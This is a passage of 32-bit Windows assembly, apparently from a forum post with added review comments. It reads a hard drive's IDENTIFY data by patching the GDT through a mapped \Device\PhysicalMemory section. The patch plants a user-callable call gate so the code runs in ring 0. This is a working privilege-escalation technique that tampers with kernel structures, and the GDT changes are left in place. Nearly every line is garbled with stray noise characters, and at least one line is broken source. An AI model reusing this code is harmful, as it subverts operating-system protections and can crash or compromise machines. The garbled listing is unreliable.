mov status,eax. S$ R( j- F. b+ Q9 p
invoke SetPhyscialMemorySectionCanBeWrited,hSection
+ o& f, ?; t3 i" g! ~0 p, g% Z8 X7 L: z, O6 M1 y1 m% t
; ZwClose(hSection) - the WRITE_DAC handle is no longer needed.
call @f" t. Q! f4 c, k/ ?- s" _ v! S8 m
db "ZwClose",0$ c4 x/ z( m( C- f5 E6 K% o( Y
@@:8 k5 f% X) z) f9 X: v
push NtdllMod
& O% {7 S4 f' ^1 s8 w' F1 Icall GetProcAddress% d$ z! A9 H3 p. e0 ~ ~8 M
5 A* y$ t3 V; e3 S4 Q: xpush hSection ]8 X0 p' X/ }4 g6 W" [( _
call eax ;ZwClose(hSection)
4 I0 L8 O. G, }+ Q+ z
; Retry the original open now that the DACL grants SECTION_MAP_WRITE.
mov eax,ebx) h6 I0 R0 a. f" |; B5 q& c
' V2 ]) q, C' Q5 i S
push esi " k3 [- T+ D0 u) m+ n! T) t; E6 ]0 g
push SECTION_MAP_READ or SECTION_MAP_WRITE
3 d% ]3 n9 e4 A3 P2 G* I0 }) K# Blea edi,hSection3 N7 v1 A9 L* t Z* f- o$ i6 s
push edi {; D0 D8 ^% ?) ^8 B* m
call eax
S& D6 {: _ g; O! u4 Jmov status ,eax) N L/ v8 f! h
;status =ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&ObjAttr);
AccessPermit:
2 M# X/ l' @. p h" ?cmp status ,STATUS_SUCCESS
! e2 d* ^/ v* C$ ^jz @f% T K5 c% c2 j$ |! c6 p* [
;printf("Error Open PhysicalMemory Section Object,Status:%08X\n",status);
;return 0;
; Failure: return 0 (no handle to close on this path).
mov eax,03 L( h, C7 N1 k$ g/ p
ret
4 b5 @( a5 u, Y& ]: d( L- J@@: Y% j% C8 @: s, F" O4 g' ~! Z
; Map GdtLimit+1 bytes of physical memory starting at the GDT's page.  esi is
; later used as the GDT base, so this assumes the GDT base is page-aligned
; (MiniMmGetPhysicalAddress dropped the low 12 bits).
movzx eax,word ptr[GdtLimit]
0 T* V" u( ?+ U: ~ kinc eax
. L7 I3 L a+ L& U: Einvoke MapViewOfFile,hSection, FILE_MAP_READ or FILE_MAP_WRITE, 0, mapAddr, eax
$ w4 u' t8 s- gmov BaseAddress,eax
9 r. c1 N; U6 y* _* T7 `5 Ocmp BaseAddress,0
7 m8 q2 e6 m8 ^- m0 Q3 njnz @f0 C0 T5 o. {) Z* v8 }
;printf("Error MapViewOffile:");
; NOTE(review): the next line was the comment ";PrintWin32Error(...)"; the
; forum removed its leading ";P".  As pasted it is not valid source.
rintWin32Error(GetLastError()); return 0; ! h, O+ s# g2 c' d7 C
; NOTE(review): hSection is left open on this failure path.
mov eax,0
" X4 Y- p& U& Xret; F/ \0 u8 b. G1 X; Q* U7 R
@@:
; Patch the GDT through the mapped view.  ecx = 3E0h = byte offset of the
; gate descriptor (selector 3E0h); the code descriptor goes at 3E8h.
( T3 S" v8 `. N& y+ W( Q4 dmov esi,eax ;esi->gdt base (user-mode view)
- I. w* p% _ p9 M$ Xmov ecx,3e0h
0 b# d) l1 Z" O) I- t. i3 Rmov eax,GdtAddr
; Skip the rewrite if this exact gate is already present (e.g. an earlier run).
7 }8 G( H! t$ z6 ~+ _.if dword ptr [esi+ecx+2]!=0ec0003e8h8 M4 l* K8 b: V- {' P; A! }
; Byte 0 of the null descriptor becomes 0C3h (`ret`): the gate below targets
; the GDT's own linear base, so the first thing executed at CPL 0 is this ret.
mov byte ptr [esi],0c3h
; f( z: |8 o; Y
; Gate descriptor at 3E0h: offset = GDT linear base (low word at +0, high
; word at +6); dword at +2 = 0EC0003E8h -> selector 3E8h, 0 dwords copied,
; type byte 0ECh = present, DPL 3, 32-bit call gate.
: a; ?, q$ V" [1 K ], v1 nmov word ptr [esi+ecx],ax
6 @, S4 Q3 B E& G9 N4 r" Dshr eax,16% G" d. Z0 V& N+ r
mov word ptr [esi+ecx+6],ax
4 x5 U# N# Z% Nmov dword ptr [esi+ecx+2],0ec0003e8h. a. n$ Y2 J5 b3 J" L+ m6 Y; G
4 W6 ~, D* R5 U; h
; Code descriptor at 3E8h: base 0, limit 0FFFFFh with G=1 (4 GB), D=1,
; access byte 9Ah = present, DPL 0, code, execute/read.
mov dword ptr [esi+ecx+8],0000ffffh
+ S- `% T3 U B% s3 Lmov dword ptr [esi+ecx+12],00cf9a00h! i+ ?" |) D1 f f S$ u
.endif% l. E n$ l0 T* A
4 H8 C% ~/ y! c5 a5 c @8 T
; setcg is set to TRUE unconditionally, so the ZwClose/return-0 block below
; (up to ChangeOK) is dead code.
mov setcg,TRUE
% t: E% p+ L7 |0 D( ?/ m; Qcmp setcg,0, Z* S9 V: g% t8 j
jnz ChangeOK* k6 m+ x! z% l9 W- Q9 B \
call @f
3 a3 O% T5 R: H, S* P! h, G9 Qdb "ZwClose",0 {+ B. ^" _/ _7 S) |
@@:2 L( F7 z( C* f- D, ^
push NtdllMod7 a1 V; M/ ` [8 M" C% |. K' {3 S
call GetProcAddress
! J; h: [: J1 H( b; p$ i) P, W6 Ppush hSection2 U' [9 W* i) s! c5 b3 D9 Q6 J. J" H
call eax
9 L) z q; Z* n8 _xor eax,eax6 I- o: {; a) g+ `" _
ret
$ {# ?1 S: E6 E0 n+ l) T7 e& ?ChangeOK:
; Callgt = far pointer {offset 0, selector 3E0h|3}: RPL 3 through the gate.
% n# t; ^* ~( W7 |- o+ p- Q, Aand dword ptr Callgt,0
; j% }5 O# i3 L% k3 axor eax,eax
0 x/ K: X1 u0 h$ F" X; D( Bmov ax,3e0h
3 Z+ u/ q( c& w" m( m0 p5 Ior al,3h
/ w) {9 K* B% y: r% Tmov word ptr [Callgt+4],ax * T& B3 d. C" I
;farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate;
; The address of a label is never 0, so the `test`/`ret` that follows is dead;
; it is a leftover of the commented-out VirtualLock call.
9 v8 ^9 W' ^ i- o Blea eax,_Ring0Proc* U: N, L) f. E( ?7 m, j) }9 g
;invoke VirtualLock,eax,seglen
! Z4 X5 ~7 ]# R4 @ wtest eax,eax
7 Y9 }0 O6 g) m0 G; wjnz @f
7 o) ~5 b0 ]8 y' J, lxor eax,eax
4 O! z! z$ r3 U% k+ uret
: Q" A* x2 C3 Z/ V$ i4 D@@:
; Raise priority and yield once before entering ring 0; restored at Ring3.
: J2 J) c' L5 z: Winvoke GetCurrentThread
1 K( O! _- s6 }invoke SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL $ L/ [2 e/ o" o9 s8 u' x
7 }$ V3 n1 q1 c# H5 d. {invoke Sleep,0
; Far call through the gate: CPL becomes 0 and the `ret` byte at the GDT base
; returns straight into the next instruction (_Ring0Proc), still at CPL 0.
- M* O- ]8 _2 H8 Mcall fword ptr [Callgt] ;use callgate to Ring0!
0 W/ X U/ A! c$ ^7 q* o, Z% z;_asm call fword ptr [farcall]
; ---- executes at CPL 0 from here to the retf before Ring3 ----
; After the `ret` the ring-0 stack holds: old CS, old ESP, old SS.  The code
; keeps the ring-0 esp in eax, switches esp to the ring-3 stack ([esp+4]) and
; pushes the ring-0 esp there for the exit sequence.
; NOTE(review): interrupts stay enabled throughout (no cli) while esp points
; at the user-mode stack; any interrupt or fault in this window is handled on
; that stack, and a fault here cannot reach main's user-mode SEH handler.
% h8 N/ c) b4 o; t_Ring0Proc: ; Ring0 code here..
# F2 @{% T3 Q$ U' ^/ m1 G' F/ ^mov eax,esp ;save ring0 esp
- i( m( x: ]5 d) k* f. I. h' rmov esp,[esp+4];->ring3 esp
, b4 \/ b% A# u& {push eax# h8 e% h1 D3 B9 W, O! P
mov ebx,offset stIDEINFO: Y/ j2 m# c8 _% Z' O( P+ ^: h p
assume ebx:ptr IDEINFO
' e( {' T$ \ W# M;********************************************************************
; wait until the drive is ready: poll the primary status port (1F7h) up to
; 10000h times for 50h = DRDY|DSC; otherwise give up (_II_TimeOut)
;********************************************************************
! z( w! A. E2 X/ w+ U1 k mov ecx,10000h4 i7 I7 p+ x7 \& B; E
mov dx,01f7h
0 v1 C! M$ q6 X2 |, S1 y @@:
7 s3 f) M' ~9 S c0 M2 s$ Y9 b in al,dx1 _9 [* b4 S! l0 b
cmp al,50h
( R7 V% F ?5 ]7 y+ o/ D1 i jz @F
% j1 _# z, n; p f! g. L/ V loop @B6 m5 A0 b5 \5 ]2 c' K, v
jmp _II_TimeOut
: z1 q9 A6 k, B$ B2 Y @@:' B( H0 a5 n- v. W7 m& g% ~. z' m
;********************************************************************
; send the command
; primary controller: ports 1F0h-1F7h
; secondary controller: ports 170h-177h
; 1F6h (drive/head): A0h selects the master device on the channel,
# |" y0 ]4 z6 n! a; B0h the slave
8 @9 i2 U! t, X6 c& i: G t; 1F7h (command): ECh = IDENTIFY DEVICE for an ATA device,
; A1h = IDENTIFY PACKET DEVICE for ATAPI
;********************************************************************
mov al,0a0h ;Drive 0,Head 0
mov dx,01f6h ;Drive and head port
2 }; y( M% r7 M6 l: ]9 ~ ^ out dx,al7 a; s" B# m$ m' m
- b/ Q* m, a9 }
mov al,0ech ;IDENTIFY DEVICE
inc dx ;Command port (1F7h)
out dx,al
3 M+ G6 e- R$ x! ]: ^;********************************************************************
. y0 ^1 G' b4 K% [9 r8 s; wait until the drive is ready: status 58h = DRDY|DSC|DRQ (data waiting)
;********************************************************************
; k! u/ G! V1 m+ B: N1 c4 o8 S6 D mov ecx,10000h9 E {/ E, h: M; ?
@@:4 k! D/ E6 m f% f- {
in al,dx;1F7h read = status register
; e7 e8 }" F1 o9 ~( b0 Q cmp al,58h;(drive ready, seek complete, data request)
( H2 G$ e4 K; Y: U$ |# U jz @F
, R5 o2 ] V% p0 ~" G% Q loop @B
: |8 p; T0 ~. m" [; D' P& j jmp _II_TimeOut
- g5 s0 S/ X3 \9 Q# s- v' F @@:0 L3 v4 M4 l7 N, L
;********************************************************************
; read the IDENTIFY data back from the data port
; all 100h words must be read (512 bytes) - but stIDEINFO is only 256 bytes,
; so the second half is written past the end of the structure
;********************************************************************
cld% I7 c& y) L0 [9 I! S
mov edx,01f0h;data port - data comes in and out here
mov edi,ebx
% B5 E' M0 }+ X; a. a; F5 G mov ecx,0100h
4 E1 X; F3 i: y/ Z1 p rep insw& k6 ]6 c) O: e! v$ P$ `- N* S
;********************************************************************
( v7 M9 L! ]! @- i1 X5 Y0 C; model, serial and firmware strings come back with each word byte-swapped;
; swap them in place: 10 words of serial, then 24 words covering firmware
; (8 bytes) and model (40 bytes), which are adjacent in IDEINFO
;********************************************************************
lea esi,[ebx].sSerialNumber
; }( R8 g6 L* m8 B0 j* t- D mov edi,esi6 Z4 r8 w N! Z9 \% ~- n) W5 i$ l( J' O
mov ecx,103 `* }4 x9 L5 a7 P4 S
@@:- X4 e, c+ Z l# R6 k2 ?
lodsw
/ ?# A" x4 E# j7 N: @6 i% u xchg ah,al$ ~: }! J8 n4 U Y V2 b
stosw
/ K! m/ G! U+ e" ~6 u+ Q$ M loop @B$ r- |# g& b) }( H) H+ ]
! K3 I, n3 P5 c& n4 s% Q lea esi,[ebx].sFirmwareRev; firmware + model, 48 bytes
mov edi,esi
4 S4 ^% V- T4 V mov ecx,24
, g' M3 [$ C1 a+ w T- n, ? @@:
; x+ Z# E# L* e. r, \ lodsw
& p+ X+ v' t. q xchg ah,al
0 d$ a5 Z5 D( q5 L. \3 U8 b/ W/ R stosw
7 ]6 s/ l- _3 N9 B+ n6 G* t& G- H loop @B
; Exit from ring 0: restore the ring-0 esp (pointing at old CS), push the
; return offset and `retf`; because the return lowers the privilege level
; the CPU also pops the saved SS:ESP.
" |* Q/ b0 N# W; q_II_TimeOut:
& v/ D2 z8 [* d+ Rassume ebx:nothing
# P# E# g* z0 d7 d/ B % Z J: y2 T, ]/ S( I
pop esp ;restore ring0 esp
o* P2 b& J( s T9 x5 c$ gpush offset Ring3
9 v6 \! L: _9 t& B |8 u p9 gretf, O/ |2 O4 \* M6 z' M, `* P! t' w7 }3 O
Ring0CodeLen=$-_Ring0Proc9 D: U7 y6 I6 F) ~+ Z
1 r% d: |8 n: Q# j
; ---- back at CPL 3 ----
Ring3:: P, P6 q0 D# P" |1 d) ^
invoke GetCurrentThread
" F4 {* W$ ^; qinvoke SetThreadPriority,eax,THREAD_PRIORITY_NORMAL
6 r$ L9 @! x ?6 H. K" g( o; g8 T. N9 @# Y! }) ~5 Y& r, }# C' a8 L- R
;invoke VirtualUnlock,Entry,seglen
: }" `& f( S+ `/ q
; ZwClose(hSection).  The mapped view (BaseAddress) is never unmapped and the
; GDT modifications are left in place.
2 Q/ a6 \+ T% b' Gcall @f5 m0 W( S: t( `
db "ZwClose",0) B, |5 C2 F3 M' r% e6 o
@@:. M: J |. B R& ?, T- R, \0 T
push NtdllMod
2 `4 o7 n7 m# C W; v$ jcall GetProcAddress
* C1 Y! w2 e8 r/ _& bpush hSection. K/ ~2 }+ B* q
call eax
4 u& |4 d- U+ L" V. W8 b8 h r4 |mov eax,TRUE
1 N, B( R- x% R/ v, k3 Mret
, @) o! x. u% Y% S \' i; Z/ \0 z* tExecRing0Proc endp
( L) n( N/ ? ]6 ~7 Y% r) p- u/ W/ U+ S+ n9 L. q6 Z. f& _ K
;-----------------------------------------------------------------------
; main: entry point.  Links a minimal SEH frame (MySEH), refuses to run when
; the DS selector has its TI bit set (the author's Win9x heuristic), calls
; ExecRing0Proc and then shows either the IDENTIFY fields from stIDEINFO or
; szErrInfo in a message box.  The return value of ExecRing0Proc is ignored;
; success is judged by stIDEINFO.wNumCyls being non-zero (the structure is
; zero-filled at load).
; NOTE(review): MySEH only sees user-mode exceptions; a fault while the ring-0
; body in ExecRing0Proc runs never reaches it.
; NOTE(review): the forum noise fused a letter onto the labels Exit1 and
; MySEH on their defining lines ("vExit1:", "FMySEH :"); the references
; elsewhere use the unfused names.
;-----------------------------------------------------------------------
main:. S( t7 E5 t7 K/ a3 k
assume fs:nothing
; Push {handler, previous frame} and point fs:[0] at it.
4 D. _- Z$ ]) I2 Z5 K8 [/ y* [push offset MySEH' r2 R" Z2 A! ?2 F* O7 f6 ~
push fs:[0] U7 k- e/ F7 f4 {
mov fs:[0],esp
; esp with the SEH frame on top; MySEH restores it before unlinking.
# t' P, F3 ?( H% |4 ?mov OldEsp,esp
; Bit 2 of a selector is TI (LDT); used here as a Win9x check.
) j: r! ^& J6 y, D$ b( U$ {mov ax,ds ;if Win9x?
test ax,4
# P) i- L& D! M) O: Qjnz Exit1
7 r# c* l) C3 E9 N. Einvoke ExecRing0Proc! G& ]+ i- f& ?, a
; Non-zero only if IDENTIFY data was stored.
6 P5 ?( Q9 g+ ~( H e3 a0 X2 P.if stIDEINFO.wNumCyls
; Copy the three fixed-width strings into buffers one byte larger; the
; trailing zero byte of each .data? buffer terminates them for wsprintf.
4 k6 A$ p) T/ v' J- a* C) U lea esi,stIDEINFO.sModelNumber
3 }' Y4 g" K+ _ mov edi,offset szModelNumber
- C% G% n3 z' n/ a: o mov ecx,sizeof stIDEINFO.sModelNumber: ]) P# |3 v0 y
rep movsb: E2 _/ D& U4 E% b$ Y% c
9 O" @( l* _! q+ z# }8 C
lea esi,stIDEINFO.sSerialNumber
: y( I6 C* w+ h/ i8 r2 Y0 c: G* i mov edi,offset szSerialNumber
6 X7 @% n) e' }6 m; d# N mov ecx,sizeof stIDEINFO.sSerialNumber* a9 Y) \& Z* v2 o2 m+ W
rep movsb
& w7 `9 X+ Z5 c6 N4 ]
& H5 u3 ?' _* V) b: I) \ lea esi,stIDEINFO.sFirmwareRev7 y# ^7 I" ]6 r- `! j5 S( l. o
mov edi,offset szFirmwareRev# r' j8 ^. b8 x4 X
mov ecx,sizeof stIDEINFO.sFirmwareRev
$ x6 A0 j) f. O rep movsb
7 "` z$ @- m4 B' q, {
; Zero-extend the 16-bit counters for the %d conversions.
( r9 Q( ^% G7 b' {- O movzx eax,stIDEINFO.wNumCyls
) \: ?( G* p* [2 D movzx ebx,stIDEINFO.wNumHeads7 F$ T2 j1 E; s2 v
movzx ecx,stIDEINFO.wSectorsPerTrack, u4 v7 B) G6 {7 S( [4 k4 H
movzx edx,stIDEINFO.wBufferSize
: j( Y. q% z z! C( b6 N invoke wsprintf,addr szBuffer,addr szIDEInfo, eax,ebx,ecx,edx, addr szModelNumber, addr szSerialNumber, addr szFirmwareRev
3 o1 u! f% O. |7 A8 S# R mov eax,offset szBuffer
, {2 n$ N2 `5 {' _.else
1 L8 y3 I& n9 T& F1 @ E% @, ] O mov eax,offset szErrInfo
A" U) f& ~0 [$ _' L.endif
$ V6 n& W/ V3 F U8 j$ s& F$ m@@:
; eax -> text to show.
% ]7 u7 g: B3 y Z4 e: R" Ninvoke MessageBox,NULL,eax,addr szTitle,MB_ICONINFORMATION or MB_OK
; Unlink the SEH frame (restore previous fs:[0], drop the handler slot).
; Also reached by `jz Exit1` inside ExecRing0Proc, with that procedure's
; frame still on the stack - the pop then reads the wrong slot.
8 t1 A* x3 A- C& v& u5 e vExit1:
4 f+ q0 ^$ a2 y* t+ npop fs:[0]+ r+ Y. w: \7 h1 T. _$ y
add esp,4
% z. K; M$ ~+ k5 b; E) k$ Pinvoke ExitProcess,0
7 a' ?1 } P2 F) j2 m% D
; SEH handler: never returns.  Resets esp to the frame saved in OldEsp so the
; same unlink sequence works, then exits with -1.
/ ?) ?$ b0 L4 h$ j c$ s+ FMySEH :$ z2 u! y3 {0 j
mov esp,OldEsp' _& l+ G+ W8 c4 @
pop fs:[0]
# b5 c) X- j4 M6 l7 p5 aadd esp,4
8 q) U8 t' B& O/ [* @invoke ExitProcess,-1- \8 |' f! F6 K
end main0 e" x" s6 g! r1 S7 l# i! a% z& w
% f( c6 y8 L: Y3 r3 N( I, J% E2 S G